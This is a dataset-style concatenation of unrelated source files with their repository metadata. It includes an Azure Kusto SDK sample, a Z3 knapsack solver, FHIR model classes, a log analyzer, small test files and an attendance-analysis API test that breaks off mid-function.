8bf5c9cb87033d334d26c9436c9f04e4b173ba65 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/kusto/azure-mgmt-kusto/generated_samples/kusto_managed_private_endpoints_check_name_availability.py | 3ccfc9a68d42bd47f54b8ba0ce14082f3885382b | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,746 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.kusto import KustoManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-kusto
# USAGE
python kusto_managed_private_endpoints_check_name_availability.py
Before running the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = KustoManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-1234-123456789098",
)
response = client.managed_private_endpoints.check_name_availability(
resource_group_name="kustorptest",
cluster_name="kustoCluster",
resource_name={"name": "pme1", "type": "Microsoft.Kusto/clusters/managedPrivateEndpoints"},
)
print(response)
# x-ms-original-file: specification/azure-kusto/resource-manager/Microsoft.Kusto/stable/2023-05-02/examples/KustoManagedPrivateEndpointsCheckNameAvailability.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
f9149adc1d138f483eb14838fe57cbf12e65eec4 | 5de5ae0adb6fb1e73c2e897fbc13b6abf53c559b | /Applications/Equations/knapsack-1.py | 98dc10ab696f6baaedba79c8b32dbe93669eedb8 | [] | no_license | Trietptm-on-Coding-Algorithms/Learning-Z3 | af935450226ee3299e10361f21a567945aa0fd5c | c5ef7faca49aa164556b3c7e9ccfb4709027cf74 | refs/heads/master | 2020-05-13T18:34:38.105308 | 2017-12-23T11:08:43 | 2017-12-23T11:08:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | # Solving knapsack problem with Z3
#
# Use:
# python knapsack.py
#
from z3 import *
# from https://www.xkcd.com/287/
fruits, fries, salad, wings, sticks, plate = Ints('fruits fries salad wings sticks plate')
s = Solver()
s.add(fruits>=0, fries>=0, salad>=0, wings>=0, sticks>=0, plate>=0)
s.add(215*fruits + 275*fries + 225*salad + 355*wings + 420*sticks + 580*plate == 1505)
result = []
while s.check() == sat:
m = s.model()
print(m)
result.append(m)
# Create new constraint the blocks the current model
block = []
for el in m:
# el is a declaration
if el.arity() > 0:
            raise Z3Exception("uninterpreted functions are not supported")
# Create a constant from declaration
obj = el()
if is_array(obj) or obj.sort().kind() == Z3_UNINTERPRETED_SORT:
raise Z3Exception("arrays and uninterpreted sorts are not supported")
block.append(obj != m[el])
s.add(Or(block))
print(len(result))
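# Note: the loop above enumerates every satisfying assignment by adding a
# "blocking clause" after each model -- a disjunction forcing at least one
# variable to take a different value -- until the solver reports unsat.
# The same idea for a generic solver s over a list of variables vs (sketch):
#     while s.check() == sat:
#         m = s.model()
#         s.add(Or([v != m[v] for v in vs]))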
# https://stackoverflow.com/questions/141779/solving-the-np-complete-proble | [
"[email protected]"
] | |
212ff7bb2d292acfcdecc48ba1e36050aa9e18ed | 7b02411227428bb746e7622736dc006ee24ca925 | /fhirclient/models/practitioner.py | a031183a9a28ca6bf7c19c5f0c4696218a018c6b | [] | no_license | NCATS-Tangerine/CPKG | 81c74abaec8de75ad769724e84d893dec117cf97 | 92b6079d61bdb975a0a4bc08879f56b686ff08ef | refs/heads/master | 2022-12-10T17:55:52.586808 | 2019-08-20T20:19:56 | 2019-08-20T20:19:56 | 202,387,355 | 0 | 0 | null | 2022-12-08T06:01:57 | 2019-08-14T16:29:04 | Python | UTF-8 | Python | false | false | 3,478 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.1.0-0931132380 (http://hl7.org/fhir/StructureDefinition/Practitioner) on 2019-08-06.
# 2019, SMART Health IT.
import sys
from dataclasses import dataclass
from typing import ClassVar, Optional, List
from .fhirabstractbase import empty_list
from .address import Address
from .attachment import Attachment
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .contactpoint import ContactPoint
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .humanname import HumanName
from .identifier import Identifier
from .period import Period
@dataclass
class PractitionerQualification(BackboneElement):
""" Certification, licenses, or training pertaining to the provision of care.
The official certifications, training, and licenses that authorize or
otherwise pertain to the provision of care by the practitioner. For
example, a medical license issued by a medical board authorizing the
    practitioner to practice medicine within a certain locality.
"""
resource_type: ClassVar[str] = "PractitionerQualification"
identifier: Optional[List[Identifier]] = empty_list()
code: CodeableConcept = None
period: Optional[Period] = None
issuer: Optional[FHIRReference] = None
def elementProperties(self):
js = super(PractitionerQualification, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("code", "code", CodeableConcept, False, None, True),
("period", "period", Period, False, None, False),
("issuer", "issuer", FHIRReference, False, None, False),
])
return js
@dataclass
class Practitioner(DomainResource):
""" A person with a formal responsibility in the provisioning of healthcare or
related services.
A person who is directly or indirectly involved in the provisioning of
healthcare.
"""
resource_type: ClassVar[str] = "Practitioner"
identifier: Optional[List[Identifier]] = empty_list()
active: Optional[bool] = None
name: Optional[List[HumanName]] = empty_list()
telecom: Optional[List[ContactPoint]] = empty_list()
address: Optional[List[Address]] = empty_list()
gender: Optional[str] = None
birthDate: Optional[FHIRDate] = None
photo: Optional[List[Attachment]] = empty_list()
qualification: Optional[List[PractitionerQualification]] = empty_list()
communication: Optional[List[CodeableConcept]] = empty_list()
def elementProperties(self):
js = super(Practitioner, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("active", "active", bool, False, None, False),
("name", "name", HumanName, True, None, False),
("telecom", "telecom", ContactPoint, True, None, False),
("address", "address", Address, True, None, False),
("gender", "gender", str, False, None, False),
("birthDate", "birthDate", FHIRDate, False, None, False),
("photo", "photo", Attachment, True, None, False),
("qualification", "qualification", PractitionerQualification, True, None, False),
("communication", "communication", CodeableConcept, True, None, False),
])
return js | [
"[email protected]"
] | |
b767dc6912417be37cab9363e2fe281e20c8e20d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_lookouts.py | 435d7553390587072a7651b0c3278816d229a48a | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 245 | py |
from xai.brain.wordbase.nouns._lookout import _LOOKOUT
#calss header
class _LOOKOUTS(_LOOKOUT, ):
def __init__(self,):
_LOOKOUT.__init__(self)
self.name = "LOOKOUTS"
self.specie = 'nouns'
self.basic = "lookout"
self.jsondata = {}
| [
"[email protected]"
] | |
bb918660688b08138dfff3f921550e5811812b22 | 6ed01f4503fc9de234a561c945adff7cf4b1c81b | /dcsTools/logTools/LogAnalizer.py | b87902b91912124b60bb08ef9caa08a1222ab954 | [] | no_license | ostwald/python-lib | b851943c913a68424a05ce3c7b42878ff9519f68 | 9acd97ffaa2f57b3e9e632e1b75016549beb29e5 | refs/heads/master | 2021-10-28T06:33:34.156095 | 2021-10-21T23:54:49 | 2021-10-21T23:54:49 | 69,060,616 | 0 | 1 | null | 2018-06-21T16:05:30 | 2016-09-23T21:04:46 | Roff | UTF-8 | Python | false | false | 2,332 | py | """
tool for analyzing catalina.out log files
e.g., "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
parses the log file and returns a list of Request objects
"""
import string
import sys
import os
import re
from time import strptime, strftime, gmtime, localtime, asctime, time, mktime
from Request import Request, logTimeToSecs
pat = re.compile ("\n\n")
def getRequests (path, filters=None):
"""
split the log file into "blobs" which are defined as chunks of text separated by a blank line
if the blob contains output from the RequestProcessor, create a Request object
optionally, a sessionID can be passed to look for Requests from that session only
"""
if type (filters) == type ("blah"):
filters = [filters]
s = open (path, 'r').read()
blobs = s.split ("\n\n")
print "processing %d blobs" % len (blobs)
requests = []
for blob in blobs:
line1 = blob.split("\n")[0]
if string.find (line1, "org.apache.struts.action.RequestProcessor process") != -1:
try:
request = Request (blob)
except:
print "failed to contstruct Request:", sys.exc_type, sys.exc_value
continue
if filters:
if (eval (string.join (filters, " and "))):
requests.append (request)
## accept = True
## for filter in filters:
## if not (eval (filter)):
## accept = False
## break
## if accept:
## requests.append (request)
else:
requests.append (request)
return requests
if __name__ == "__main__":
t1 = "Aug 12, 2005 12:00:01 AM"
t2 = "Aug 13, 2005 5:00:00 PM"
t1secs = logTimeToSecs (t1)
t2secs = logTimeToSecs (t2)
filters = None
path = "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
sessionId = "1DE5755F9DE662AD2D1615E23801027B"
filter1 = "request.sessionId == '%s'" % sessionId
filter2 = "request.time_stamp > %s and request.time_stamp < %s" % (t1secs, t2secs)
filter3 = "request.isStatusEvent()"
filters = (filter3,filter2)
requests = getRequests(path, filters)
if filters:
print "filters"
for f in filters:
print "\t" + f
print "%d requests extracted" % len (requests)
for i in range (min (len (requests), 10)):
print "\n-- %d / %d --\n%s" % ( i, len (requests), requests[i].log_entry)
## print "\n-- %d --%s" % ( i, requests[i].time_stamp)
| [
"[email protected]"
] | |
f27e2f2cc8ef12eb3d323fbd3190a05d27836935 | 404a8596d3c4a55efe57e6fe5f2f19747a487e28 | /baekjoon/5565_receipt.py | aea7c94e573bc71e5e01f4d21b41b01260efb873 | [] | no_license | taehwan920/Algorithm | 370b72e48ba404ae1fb7a7786165b88a8daf090a | f837034d0c2f7cac370eb8cceacb8b3827ec62f9 | refs/heads/master | 2021-08-17T07:14:33.594428 | 2021-01-01T14:26:35 | 2021-01-01T14:26:35 | 237,892,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | n = int(input())
for i in range(9):
n -= int(input())
print(n)
| [
"[email protected]"
] | |
71d201020a8661345685b3fe0dcde8ba8c88b1f4 | 49ba5356bdc5df7dd9803b56fe507c5164a90716 | /plus-one/test_solution.py | 574ad18d65637674d36fc84b6ad97ac231f5ded6 | [] | no_license | uxlsl/leetcode_practice | d80ad481c9d8ee71cce0f3c66e98446ced149635 | d8ed762d1005975f0de4f07760c9671195621c88 | refs/heads/master | 2021-04-25T18:12:28.136504 | 2020-03-11T07:54:15 | 2020-03-11T07:54:15 | 121,472,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | from solution import Solution
def test_solution():
s = Solution()
assert s.plusOne([1]) == [2]
assert s.plusOne([1, 2, 3]) == [1, 2, 4]
assert s.plusOne([1, 2, 9]) == [1, 3, 0]
assert s.plusOne([9, 9, 9]) == [1, 0, 0, 0]
| [
"[email protected]"
] | |
d4dcf28a56df6392227f886cba49f02edc0a4425 | 9152c6f5b692694c4cb95725319fc8dd21d30455 | /tests/test_sharepoint_group.py | 35ff7ddb18dd00b39d3d1f90d47262fff460b3cf | [
"MIT"
] | permissive | VISIN9/Office365-REST-Python-Client | cf3de86a6bdd2461ff5814dbfa02d4d4185917d5 | 91c07d427a76197f6eb143c6253bdc832cbb889d | refs/heads/master | 2021-05-25T08:43:35.530546 | 2020-04-06T20:24:53 | 2020-04-06T20:24:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,336 | py | from tests.sharepoint_case import SPTestCase
class TestSharePointGroup(SPTestCase):
@classmethod
def setUpClass(cls):
super(TestSharePointGroup, cls).setUpClass()
cls.target_user_name = "i:0#.f|membership|[email protected]"
target_group_name = "Communication site Visitors"
cls.target_group = cls.client.web.siteGroups.get_by_name(target_group_name)
def test1_get_current_user_groups(self):
groups = self.client.web.currentUser.groups
self.client.load(groups)
self.client.execute_query()
self.assertGreaterEqual(len(groups), 0)
def test2_add_user_to_group(self):
target_user = self.target_group.users.add_user(self.target_user_name)
self.client.execute_query()
self.assertIsNotNone(target_user.properties['Id'])
def test3_delete_user_from_group(self):
target_users = self.target_group.users
self.client.load(target_users)
self.client.execute_query()
users_count_before = len(target_users)
self.assertGreater(users_count_before, 0)
user_id = target_users[0].properties['Id']
target_users.remove_by_id(user_id)
self.client.load(target_users)
self.client.execute_query()
self.assertEqual(users_count_before, len(target_users) + 1)
| [
"[email protected]"
] | |
edee59048bf7db2a486cc4da27fba9608ec32e7a | 909ae0ab0f4fe78de433c3d72b34b84848303ee8 | /lending-club/venv/bin/jupyter-kernel | d0fe4631191e2897d3d90fd697e3b7c5e8f6b55c | [] | no_license | jakekasan/data-science | f5cf2a7c0ead56e04a3549b930ca974495faae49 | 4bf589c268c517525abf3170c24cf42e0ae872cf | refs/heads/master | 2021-09-17T21:18:51.278247 | 2018-07-05T07:31:51 | 2018-07-05T07:31:51 | 114,106,343 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | #!/Users/jakubkasan/coding/data-science/lending-club/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_client.kernelapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
384b044a26741c3691f5aad15dccf32d43789fcd | 184310f55b58e854dc3b6c58599ef99bc4c95739 | /hujian_api/API_service/TestCase/Attendance_analyse_late_02.py | f08ad74fb962f34245281fa4384265995c3344b0 | [] | no_license | tanjijun1/Python_API | c8585821a627c399fea1ab31bb024be6b82dd3ab | 3c4771875870ffe425d2d39fc28a50449b1752f2 | refs/heads/master | 2023-01-07T23:30:30.284433 | 2020-11-11T08:43:10 | 2020-11-11T08:43:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 20,314 | py | import pytest
import allure
import requests
import json
import time
from Params.params import Login
from Params.params import Login_info
from Params.params import Password_reset
from Params.params import Log_info
from Params.params import Log_latest
from Params.params import Log_list
from Params.params import Attendance_groups_sync
from Params.params import Attendance_schedules_sync
from Params.params import Attendance_records_sync
from Params.params import Flow_sync
from Params.params import Department_sync
from Params.params import Department_list
from Params.params import Department_employees_list
from Params.params import Department_employee_query
from Params.params import Attendance_class_list
from Params.params import Attendance_analyse
from Params.params import Attendance_analyse_result
from Params.params import Attendance_analyse_result_statistics
from Common import Post
from Common import Get
from Common import Assert
from Common import Consts
class Attendance_analyse_late_02:
@allure.severity('normal')
@allure.feature('Attendance_analyse')
@allure.story('Attendance_analyse_late')
def test_late_02(self):
session_a = requests.session()
get_req = Get.Get()
ass = Assert.Assertions()
url_2019_10 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-10-01 00:00:00&endDate=2019-10-31 00:00:00&userIds=056621220036405378'
        # analyse attendance of user 056621220036405378 for October 2019
res_2019_10 = get_req.get_model_a(session_a,url_2019_10)
time.sleep(10)
resCode_2019_10 = res_2019_10['code']
resText_2019_10 = res_2019_10['text']
#print(resText_2019_10)
assert ass.assert_code(resCode_2019_10, 200)
assert ass.assert_in_text(resText_2019_10, 'ok')
Consts.RESULT_LIST.append('True')
url_2019_11 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-11-01 00:00:00&endDate=2019-11-30 00:00:00&userIds=056621220036405378'
        # analyse attendance of user 056621220036405378 for November 2019
res_2019_11 = get_req.get_model_a(session_a, url_2019_11)
time.sleep(10)
resCode_2019_11 = res_2019_11['code']
resText_2019_11 = res_2019_11['text']
#print(resText_2019_11)
assert ass.assert_code(resCode_2019_11, 200)
assert ass.assert_in_text(resText_2019_11, 'ok')
Consts.RESULT_LIST.append('True')
url_2019_12 = 'http://172.16.2.101:4000/api/attendance/analyse?startDate=2019-12-01 00:00:00&endDate=2019-12-31 00:00:00&userIds=056621220036405378'
        # analyse attendance of user 056621220036405378 for December 2019
res_2019_12 = get_req.get_model_a(session_a, url_2019_12)
time.sleep(10)
resCode_2019_12 = res_2019_12['code']
resText_2019_12 = res_2019_12['text']
#print(resText_2019_12)
assert ass.assert_code(resCode_2019_12, 200)
assert ass.assert_in_text(resText_2019_12, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_10 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-10-01 00:00:00&endDate=2019-10-31 00:00:00&pageSize=31'
        # fetch the attendance analysis result of user 056621220036405378 for October 2019
res_result_2019_10 = get_req.get_model_a(session_a,url_result_2019_10)
res_resultCode_2019_10 = res_result_2019_10['code']
res_resultText_2019_10 = res_result_2019_10['text']
assert ass.assert_code(res_resultCode_2019_10, 200)
assert ass.assert_in_text(res_resultText_2019_10, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_11 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-11-01 00:00:00&endDate=2019-11-30 00:00:00&pageSize=31'
        # fetch the attendance analysis result of user 056621220036405378 for November 2019
res_result_2019_11 = get_req.get_model_a(session_a, url_result_2019_11)
res_resultCode_2019_11 = res_result_2019_11['code']
res_resultText_2019_11 = res_result_2019_11['text']
assert ass.assert_code(res_resultCode_2019_11, 200)
assert ass.assert_in_text(res_resultText_2019_11, 'ok')
Consts.RESULT_LIST.append('True')
url_result_2019_12 = 'http://172.16.2.101:4000/api/attendance/analyse/list?userId=056621220036405378&startDate=2019-12-01 00:00:00&endDate=2019-12-31 00:00:00&pageSize=31'
        # fetch the attendance analysis result of user 056621220036405378 for December 2019
res_result_2019_12 = get_req.get_model_a(session_a, url_result_2019_12)
res_resultCode_2019_12 = res_result_2019_12['code']
res_resultText_2019_12 = res_result_2019_12['text']
assert ass.assert_code(res_resultCode_2019_12, 200)
assert ass.assert_in_text(res_resultText_2019_12, 'ok')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_10 = json.loads(res_resultText_2019_10)
resInfo_10_01 = res_resultDict_2019_10['result']['list'][0]
resInfo_10_02 = res_resultDict_2019_10['result']['list'][1]
resInfo_10_03 = res_resultDict_2019_10['result']['list'][2]
resInfo_10_04 = res_resultDict_2019_10['result']['list'][3]
resInfo_10_05 = res_resultDict_2019_10['result']['list'][4]
resInfo_10_06 = res_resultDict_2019_10['result']['list'][5]
resInfo_10_07 = res_resultDict_2019_10['result']['list'][6]
resInfo_10_08 = res_resultDict_2019_10['result']['list'][7]
resInfo_10_09 = res_resultDict_2019_10['result']['list'][8]
resInfo_10_10 = res_resultDict_2019_10['result']['list'][9]
resInfo_10_11 = res_resultDict_2019_10['result']['list'][10]
resInfo_10_12 = res_resultDict_2019_10['result']['list'][11]
resInfo_10_13 = res_resultDict_2019_10['result']['list'][12]
resInfo_10_14 = res_resultDict_2019_10['result']['list'][13]
resInfo_10_15 = res_resultDict_2019_10['result']['list'][14]
resInfo_10_16 = res_resultDict_2019_10['result']['list'][15]
resInfo_10_17 = res_resultDict_2019_10['result']['list'][16]
resInfo_10_18 = res_resultDict_2019_10['result']['list'][17]
resInfo_10_19 = res_resultDict_2019_10['result']['list'][18]
resInfo_10_20 = res_resultDict_2019_10['result']['list'][19]
resInfo_10_21 = res_resultDict_2019_10['result']['list'][20]
resInfo_10_22 = res_resultDict_2019_10['result']['list'][21]
resInfo_10_23 = res_resultDict_2019_10['result']['list'][22]
resInfo_10_24 = res_resultDict_2019_10['result']['list'][23]
resInfo_10_25 = res_resultDict_2019_10['result']['list'][24]
resInfo_10_26 = res_resultDict_2019_10['result']['list'][25]
resInfo_10_27 = res_resultDict_2019_10['result']['list'][26]
resInfo_10_28 = res_resultDict_2019_10['result']['list'][27]
resInfo_10_29 = res_resultDict_2019_10['result']['list'][28]
resInfo_10_30 = res_resultDict_2019_10['result']['list'][29]
resInfo_10_31 = res_resultDict_2019_10['result']['list'][30]
assert ass.assert_in_text(resInfo_10_01, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_03, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_05, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_06, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_07, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_08, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_09, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_10, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_11, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_12, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_13, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_15, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_16, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_17, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_18, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_19, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_20, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_21, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_22, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_23, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_24, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_25, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_26, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_27, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_28, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_29, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_30, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_10_31, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_11 = json.loads(res_resultText_2019_11)
resInfo_11_01 = res_resultDict_2019_11['result']['list'][0]
resInfo_11_02 = res_resultDict_2019_11['result']['list'][1]
resInfo_11_03 = res_resultDict_2019_11['result']['list'][2]
resInfo_11_04 = res_resultDict_2019_11['result']['list'][3]
resInfo_11_05 = res_resultDict_2019_11['result']['list'][4]
resInfo_11_06 = res_resultDict_2019_11['result']['list'][5]
resInfo_11_07 = res_resultDict_2019_11['result']['list'][6]
resInfo_11_08 = res_resultDict_2019_11['result']['list'][7]
resInfo_11_09 = res_resultDict_2019_11['result']['list'][8]
resInfo_11_10 = res_resultDict_2019_11['result']['list'][9]
resInfo_11_11 = res_resultDict_2019_11['result']['list'][10]
resInfo_11_12 = res_resultDict_2019_11['result']['list'][11]
resInfo_11_13 = res_resultDict_2019_11['result']['list'][12]
resInfo_11_14 = res_resultDict_2019_11['result']['list'][13]
resInfo_11_15 = res_resultDict_2019_11['result']['list'][14]
resInfo_11_16 = res_resultDict_2019_11['result']['list'][15]
resInfo_11_17 = res_resultDict_2019_11['result']['list'][16]
resInfo_11_18 = res_resultDict_2019_11['result']['list'][17]
resInfo_11_19 = res_resultDict_2019_11['result']['list'][18]
resInfo_11_20 = res_resultDict_2019_11['result']['list'][19]
resInfo_11_21 = res_resultDict_2019_11['result']['list'][20]
resInfo_11_22 = res_resultDict_2019_11['result']['list'][21]
resInfo_11_23 = res_resultDict_2019_11['result']['list'][22]
resInfo_11_24 = res_resultDict_2019_11['result']['list'][23]
resInfo_11_25 = res_resultDict_2019_11['result']['list'][24]
resInfo_11_26 = res_resultDict_2019_11['result']['list'][25]
resInfo_11_27 = res_resultDict_2019_11['result']['list'][26]
resInfo_11_28 = res_resultDict_2019_11['result']['list'][27]
resInfo_11_29 = res_resultDict_2019_11['result']['list'][28]
resInfo_11_30 = res_resultDict_2019_11['result']['list'][29]
assert ass.assert_in_text(resInfo_11_01, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_02, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_03, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_04, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_05, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_06, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_07, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_08, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_09, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_10, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_11, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_12, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_13, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_14, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_15, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_16, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_17, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_18, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_19, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_20, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_21, 'ABNORMAL')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_22, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_23, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_24, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_25, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_26, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_27, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_28, 'SUCCESS')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_29, 'ABNORMAL480')
Consts.RESULT_LIST.append('True')
assert ass.assert_in_text(resInfo_11_30, 'SUCCESS')
Consts.RESULT_LIST.append('True')
res_resultDict_2019_12 = json.loads(res_resultText_2019_12)
resInfo_12_01 = res_resultDict_2019_12['result']['list'][0]
resInfo_12_02 = res_resultDict_2019_12['result']['list'][1]
resInfo_12_03 = res_resultDict_2019_12['result']['list'][2]
resInfo_12_04 = res_resultDict_2019_12['result']['list'][3]
resInfo_12_05 = res_resultDict_2019_12['result']['list'][4]
resInfo_12_06 = res_resultDict_2019_12['result']['list'][5]
resInfo_12_07 = res_resultDict_2019_12['result']['list'][6]
resInfo_12_08 = res_resultDict_2019_12['result']['list'][7]
resInfo_12_09 = res_resultDict_2019_12['result']['list'][8]
resInfo_12_10 = res_resultDict_2019_12['result']['list'][9]
resInfo_12_11 = res_resultDict_2019_12['result']['list'][10]
resInfo_12_12 = res_resultDict_2019_12['result']['list'][11]
resInfo_12_13 = res_resultDict_2019_12['result']['list'][12]
resInfo_12_14 = res_resultDict_2019_12['result']['list'][13]
resInfo_12_15 = res_resultDict_2019_12['result']['list'][14]
resInfo_12_16 = res_resultDict_2019_12['result']['list'][15]
resInfo_12_17 = res_resultDict_2019_12['result']['list'][16]
resInfo_12_18 = res_resultDict_2019_12['result']['list'][17]
resInfo_12_19 = res_resultDict_2019_12['result']['list'][18]
resInfo_12_20 = res_resultDict_2019_12['result']['list'][19]
